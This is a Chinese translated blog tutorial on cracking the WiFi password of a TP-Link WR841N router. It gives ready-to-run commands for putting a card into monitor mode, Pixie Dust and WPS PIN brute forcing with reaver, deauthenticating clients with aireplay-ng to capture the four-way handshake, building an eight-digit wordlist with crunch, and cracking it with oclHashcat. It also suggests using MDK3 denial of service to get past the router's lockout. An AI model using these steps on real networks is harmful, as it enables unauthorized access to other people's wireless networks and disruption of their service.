网站首页 > 资源文章 正文
翻译:secist
预估稿费:100RMB(不服你也来投稿啊!)
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
前言
在这篇文章中,我将会向你展示如何破解TP Link WR841N路由器无线密码。这款 TP Link路由器外壳上有8个字符的PIN码并默认支持WPS PIN作为WiFi密码。基于以上特点,我将尝试以下技术来破解TP Link WR841N无线密码:
1.首先我将使用Pixiedust WPS Reaver 1.5.2和Aircrack-ng套件来尝试获取密码。
2.接着我将尝试使用reaver来获取WPS PIN码。
3.最后我将使用Airodump-ng来抓取四步握手过程,并使用crunch生成默认密码列表,并结合oclHashcat进行爆破。
1.使用 Reaver 实现 Pixie Dust WPS 攻击
让我们先通过以下命令将网卡设置为监听模式:
1 | airmon-ng start wlan0 |
在 kali 2.0 sana 版本下,出现以下错误:
1 | [X] ERROR: Failed to open ‘wlan0mon’ for capturing |
解决方案如下:
1. 首先将网卡设置为监听模式 airmon-ng start wlan0
2. 上步操作将会启动一个名为 wlan0mon 的监听网卡
3. 使用 iwconfig 命令,检查网卡模式是否仍处于管理模式,如果是的话我们使用以下命令来将其设置为监听模式:
123 | ifconfig wlan0mon down iwconfig wlan0mon mode monitor ifconfig wlan0mon up |
4. 再次使用 iwconfig 命令检查其是否已经成功设置为监听模式
5. 启动:airodump-ng wlan0mon up
特殊情况下我们可以杀死KAIL的相关进程。
现在让我们启动 airodump-NG 获取目标的 BSSID,MAC 地址和 channel 。
1 | airodump-ng -i wlan0mon |
下面我们使用获取到的 BSSID 和 channel 结合Reaver来获取目标的 PKE, PKR, e-hash 1&2, E/R-nonce 和 authkey 以供 pixiewps 破解使用:
1 | Reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel] |
现在我们启动 pixiewps 如下:
基本参数;
1234567 | - E-HASH1,这个hash 值是我们破解前半部分 PIN 码所要使用的 hash 。 - E-HASH2,这个hash 值是我们破解后半部分 PIN 码所要使用的 hash 。 - HMAC ,是密钥相关的哈希运算消息认证码。 - PSK1,是路由器PIN码的前半段(有10,000种可能性) - PSK2,是路由器PIN码的后半段(这里有1000种可能性,因为其中一位为效验码。就算有10000种可能性,对我们而言依旧很轻松就能破解)。 - PKE,是注册人的公钥(用于验证WPS交换的合法性和防止重放)。 - PKR,是注册的公钥(用于验证一个WPS交换的合法性和防止重放)。 |
从结果可以看出,该路由器不存在可被 WPS 攻击的漏洞。
2.Reaver WPS PIN 攻击
我们使用如下命令开始进行 WPS PIN 攻击:
1 | reaver -i wlan0mon -b [BSSID] -vv -c 1 -d 5 –w |
不幸的是在 6 次尝试破解后,路由器的锁定机制被触发,导致我们无法继续在进行爆破尝试。如果出现这种情况,我们其实可以使用 MDK3 来对目标发起 DoS 强制断开目标网络,致使其路由器重启,从而帮助我们绕过锁定机制。
3.使用 oclHashcat 暴力破解路由器
让我们看看我们是否可以通过捕捉4次握手包,及使用默认路由器密码列表来进行离线的暴破来得到密码。我们将使用以下工具:
1. 使用 crunch 来生成密码列表。
2. 使用 airodump-ng 来捕捉四次握手包。
3. 使用 airplay-ng 来打断目标客户机连接。
4. Windows下使用 oclHashcat GPU。
首先让我们使用 crunch 来生成字典:
1 | crunch 8 8 1234567890 -o /root/Desktop/88numlist.txt |
这可能需要一段时间,将会生成一个 900 M大小,由8位数字所有组合的字典表。
接着,让我们来通过 Airodump-ng 和 Aireplay-ng 来抓取目标的握手包数据。我们先用 Airodump-ng 来找到我们的目标:
1 | airodump-ng wlan0mon |
现在选择你目标的BSSID和 channel,并重新启动以上命令:
1 | airodump-ng –bssid [BSSID] -c [channel]-w [握手包 .cap]wlan0mon |
最后我们打开一个新的 terminal 窗口,并使用 Aireplay-ng 来强制打断目标连接使其重新连接。命令如下:
1 | aireplay-ng -0 2 -a [BSSID] -c [Client MAC] wlan0mon |
可以看到我们成功使目标客户机重新连接,并成功的抓取到了四步握手过程!
第3步:猜解默认路由器密码列表
我们将在Windows上使用oclHashcat GPU结合我们之前生成的密码字典来破解 WIFI 密码。
在此之前,我们必须将.CAP文件转换为.hccap文件。命令如下:
1 | aircrack-ng -J [Filepath to save .hccap file] [Filepath to .cap file] |
现在,我们就可以在Windows上启动oclHashcat开始进行暴破任务啦!
1 | oclhashcat64.exe -m 2500 -w 3 –[gpu-temp-retain=60] –status -o cracked.txt tplink.hccap 88numlist.txt |
不一会时间,密码就被成功爆破:
1 |
|
猜你喜欢
- 2024-09-11 忘记WIFI密码怎么办?这几个小技巧轻松找回!
- 2024-09-11 TP-Link路由器TL-WR842N如何设置密码的方法
- 2024-09-11 迷你型tplink路由器怎么设置密码(tp迷你无线路由器怎么设置密码)
- 2024-09-11 用手机更改WIFI密码 简单快速完成
- 2024-09-11 TP-Link TL-WR847N管理员密码是多少?
- 2024-09-11 怎么更改无线路由器密码(怎么更改无线路由器密码和名称)
- 2024-09-11 3D 人脸识别 + 免费送装拆旧:TP-LINK 全自动智能门锁 799 元
- 2024-09-11 tplink路由器上要怎么设置才能够防止被蹭网?
- 2024-09-11 tp路由器防止被蹭wifi的绝招 万能钥匙该下岗了
- 2024-09-11 TP-Link智能灯泡存在漏洞,黑客可以窃取WiFi密码
你 发表评论:
欢迎- 07-03win7去掉桌面图标小箭头怎么操作 win7桌面快捷方式箭头怎么去除
- 07-03win7声音图标不见了怎么办(windows7声音没了怎么办)
- 07-03男生勿入:Win10/Win7/Win8.1女生图标下载
- 07-03桌面只有回收站图标,给Win7/10系统在桌面添加“计算机”图标
- 07-03经典windows桌面图标手机壁纸(经典windows桌面背景)
- 07-03如何在Win10启用Win7/Win8.1通知区域图标设置?
- 07-03win7声音图标不见了解决步骤(win7旗舰版声音图标不显示)
- 07-03为什么回收站图标没了?win11/win10/win7电脑如何显示回收站图标
- 最近发表
-
- win7去掉桌面图标小箭头怎么操作 win7桌面快捷方式箭头怎么去除
- win7声音图标不见了怎么办(windows7声音没了怎么办)
- 男生勿入:Win10/Win7/Win8.1女生图标下载
- 桌面只有回收站图标,给Win7/10系统在桌面添加“计算机”图标
- 经典windows桌面图标手机壁纸(经典windows桌面背景)
- 如何在Win10启用Win7/Win8.1通知区域图标设置?
- win7声音图标不见了解决步骤(win7旗舰版声音图标不显示)
- 为什么回收站图标没了?win11/win10/win7电脑如何显示回收站图标
- Win7怎么更换本地磁盘图标?(win7桌面改d盘)
- Win7桌面图标消失怎么办?(win7桌面图标全没了怎么办)
- 标签列表
-
- 电脑显示器花屏 (79)
- 403 forbidden (65)
- linux怎么查看系统版本 (54)
- 补码运算 (63)
- 缓存服务器 (61)
- 定时重启 (59)
- plsql developer (73)
- 对话框打开时命令无法执行 (61)
- excel数据透视表 (72)
- oracle认证 (56)
- 网页不能复制 (84)
- photoshop外挂滤镜 (58)
- 网页无法复制粘贴 (55)
- vmware workstation 7 1 3 (78)
- jdk 64位下载 (65)
- phpstudy 2013 (66)
- 卡通形象生成 (55)
- psd模板免费下载 (67)
- shift (58)
- localhost打不开 (58)
- 检测代理服务器设置 (55)
- frequency (66)
- indesign教程 (55)
- 运行命令大全 (61)
- ping exe (64)
本文暂时没有评论,来添加一个吧(●'◡'●)